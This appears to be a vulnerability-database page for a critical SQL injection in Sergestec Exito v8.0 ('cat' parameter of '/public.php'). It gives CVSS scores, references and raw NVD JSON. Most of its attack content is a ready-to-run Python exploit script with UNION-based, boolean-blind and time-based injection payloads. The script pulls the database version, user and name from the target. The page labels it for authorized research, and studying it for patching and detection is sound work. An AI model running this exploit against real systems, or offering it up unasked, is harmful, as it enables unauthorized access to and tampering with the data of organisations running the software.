CVE-2025-41018

Description

SQL injection in Sergestec's Exito v8.0. This vulnerability allows an attacker to retrieve, create, update, and delete databases through the 'cat' parameter in '/public.php'.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sergestec:exito:8.0:*:*:*:*:*:*:* - VULNERABLE

Sergestec Exito v8.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-41018 - Sergestec Exito v8.0 SQL Injection PoC
# Vulnerability: SQL Injection via 'cat' parameter in '/public.php'
# CVSS: 9.8 (Critical)
# Author: Security Researcher

import requests
import sys

TARGET_URL = "http://target.example.com/public.php"
INJECTION_PARAM = "cat"

# Basic SQL Injection payload to verify vulnerability
def verify_sqli(target_url, param):
    """
    Verify SQL injection vulnerability by sending a simple test payload
    """
    # Normal request
    normal_payload = "1"
    normal_response = requests.get(target_url, params={param: normal_payload})

    # SQL Injection test payload (single quote to trigger error)
    sqli_payload = "1'"
    sqli_response = requests.get(target_url, params={param: sqli_payload})

    # Compare responses - different responses indicate possible SQLi
    if normal_response.text != sqli_response.text:
        print("[+] SQL Injection vulnerability confirmed!")
        print(f"[+] Normal response length: {len(normal_response.text)}")
        print(f"[+] Error response length: {len(sqli_response.text)}")
        return True
    return False


# UNION-based SQL Injection to extract database information
def extract_data_union(target_url, param):
    """
    Use UNION-based SQLi to extract database version and current user
    """
    # Payload to extract DB version and user
    # Adjust column count based on the original query
    payload = "1' UNION SELECT 1,version(),user(),database(),5-- -"

    response = requests.get(target_url, params={param: payload})

    if response.status_code == 200:
        print(f"[+] Response:\n{response.text}")
        return response.text
    return None


# Boolean-based blind SQL Injection
def extract_data_boolean(target_url, param):
    """
    Use boolean-based blind SQLi to extract data character by character
    """
    result = ""
    for position in range(1, 50):
        low, high = 32, 126
        while low <= high:
            mid = (low + high) // 2
            # ASCII value comparison payload
            payload = f"1' AND ASCII(SUBSTRING(database(),{position},1))>{mid}-- -"
            response = requests.get(target_url, params={param: payload})

            # Compare with true condition
            true_payload = f"1' AND 1=1-- -"
            true_response = requests.get(target_url, params={param: true_payload})

            if response.text == true_response.text:
                low = mid + 1
            else:
                high = mid - 1

        if low > 126 or low < 32:
            break
        result += chr(low)
        sys.stdout.write(f"\r[+] Extracting: {result}")
        sys.stdout.flush()

    print(f"\n[+] Database name: {result}")
    return result


# Time-based blind SQL Injection
def extract_data_time(target_url, param):
    """
    Use time-based blind SQLi for data extraction
    """
    import time

    # Test if time-based injection works
    payload = "1' AND SLEEP(5)-- -"
    start_time = time.time()
    response = requests.get(target_url, params={param: payload})
    elapsed_time = time.time() - start_time

    if elapsed_time >= 5:
        print("[+] Time-based SQL Injection confirmed!")
        return True
    return False


if __name__ == "__main__":
    print("[*] CVE-2025-41018 PoC - Sergestec Exito v8.0 SQL Injection")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Vulnerable parameter: {INJECTION_PARAM}")
    print("-" * 60)

    # Step 1: Verify vulnerability
    if verify_sqli(TARGET_URL, INJECTION_PARAM):
        # Step 2: Try UNION-based extraction
        print("\n[*] Attempting UNION-based data extraction...")
        extract_data_union(TARGET_URL, INJECTION_PARAM)

        # Step 3: Try time-based blind injection
        print("\n[*] Testing time-based blind injection...")
        extract_data_time(TARGET_URL, INJECTION_PARAM)
    else:
        print("[-] Target does not appear to be vulnerable")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-41018
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-41018
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-41018/
[4] VulDB https://vuldb.com/cve/CVE-2025-41018
[5] https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sergestec-products

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-41018", "sourceIdentifier": "[email protected]", "published": "2025-10-16T08:15:34.820", "lastModified": "2025-10-21T13:12:27.793", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection in Sergestec's Exito v8.0. This vulnerability allows an attacker to retrieve, create, update, and delete databases through the 'cat' parameter in '/public.php'."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sergestec:exito:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "6A19865C-ECE1-4603-B70C-1DE47F6EA41D"}]}]}], "references": [{"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-sergestec-products", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}